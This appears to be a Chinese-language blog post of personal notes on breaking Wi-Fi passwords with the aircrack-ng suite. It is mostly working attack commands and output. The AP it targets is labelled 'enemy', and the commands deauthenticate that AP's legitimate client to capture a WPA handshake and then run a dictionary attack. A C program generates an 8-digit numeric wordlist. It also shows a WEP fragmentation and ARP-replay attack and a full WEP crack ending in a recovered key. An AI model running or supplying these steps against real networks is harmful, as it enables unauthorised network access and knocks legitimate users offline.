00:23:69:xx:xx:xx -85 6 54 WPA TKIP PSK HCP

00:0A:EB:xx:xx:xx 本地MAC
00:23:69:xx:xx:xx 敌人MAC
00:14:A5:xx:xx:DD 敌人AP中的一个合法客户的MAC

airodump-ng -c 6 –bssid 00:23:69:xx:xx:xx -w HCP mon0

aireplay-ng -0 10 -a 00:23:69:xx:xx:xx mon0
或者输入：aireplay-ng -0 10 -a (ap mac) -c (合法客户端mac) mon0
aireplay-ng -0 10 -a 00:23:69:xx:xx:xx -c 00:14:A5:xx:xx:DD mon0
要取得一个撑手包就可以了

字典破解
aircrack-ng -w password.txt HCP*.cap
另一说是用aircrack-ng -w password.txt -b (ap mac) 12345*.cap

linux下字典的生成 p.c

#include <stdio.h>
#include <stdlib.h>

int main(void)
{
int i=1;
//printf("%dn",sizeof(long int));
printf("00000000n");
while(i<=9){printf("0000000%dn",i);i++;}
while(i<=99){printf("000000%dn",i);i++;}
while(i<=999){printf("00000%dn",i);i++;}
while(i<=9999){printf("0000%dn",i);i++;}
while(i<=99999){printf("000%dn",i);i++;}
while(i<=999999){printf("00%dn",i);i++;}
while(i<=9999999){printf("0%dn",i);i++;}
while(i<=99999999){printf("%dn",i);i++;}

return 0;
}

gcc p.c -o p
./p > 8bit

这是生成的8位纯数字字典,生成后大小为853M

如果不能白，请参考
http://www.kumouse.com/article.asp?id=144
http://www.kumouse.com/article.asp?id=156

airodump-ng -c 6 –bssid 00:18:39:xx:xx:xx -w c1 mon0
aireplay-ng -1 0 -e "TP-LINK" -a 00:18:39:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0

aireplay-ng -5 -b 00:18:39:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0

packetforge-ng -0 -a 00:18:39:xx:xx:xx -h 00:0A:EB:xx:xx:xx 5 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1208-192737.xor -w arp

aireplay-ng -2 -r arp -x 1024 mon0

如果不明白，请参考上一篇文章
http://www.kumouse.com/article.asp?id=144

yum install aircrack-ng

今天测试一下wep密码到底多容易解开
下面是全过程
1.设置网卡为监听模式
airmon-ng start wlan0 6
2.搜索周边的网络
airodump-ng mon0
3.收集必要多的包
airodump-ng -c 6 –bssid 00:21:27:xx:xx:xx -w TP-LINK mon0
注：00:21:27:xx:xx:xx为要破解的AP的MAC，-c 6 为频道6
4.用功击来加快收集包的速度
aireplay-ng -1 0 -a 00:21:27:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0
aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:21:27:xx:xx:xx -h 00:0A:EB:xx:xx:xx mon0
注：00:21:27:xx:xx:xx 要破解的AP的MAC,00:0A:EB:xx:xx:xx为本地无线网卡的MAC
5.收集到5000包以上，就可以进行破解了，等待结果
aircrack-ng TP-LINK*.cap
6.看结果
Aircrack-ng 1.0

[00:04:51] Tested 8253 keys (got 25010 IVs)

KB depth byte(vote)
0 0/ 1 19(39936) 74(32768) B7(32000) 8B(31744) 7D(31232) 25(30976)
1 13/ 20 C8(29440) 2C(29184) 39(29184) 3D(29184) 65(29184) 73(29184)
2 0/ 1 08(39424) A9(32512) 28(32256) F0(32256) 83(30976) 94(30720)
3 0/ 14 26(33792) D0(33280) CC(32768) C7(31232) 95(30464) 98(30464)
4 5/ 31 00(30976) B4(30720) 12(30720) 1F(30720) 29(30720) 5D(30720)

KEY FOUND! [ 19:81:09:27:11 ]
  Decrypted correctly: 100%
密码看到了吗？就是1981092711,总共用了25000个包，用时4分钟
============================================================
有空再试一下wpa的破解

关于单无线网卡连接多个AP,VirtualWifi只能在windows下使用
怎么用先在网上找，待续…..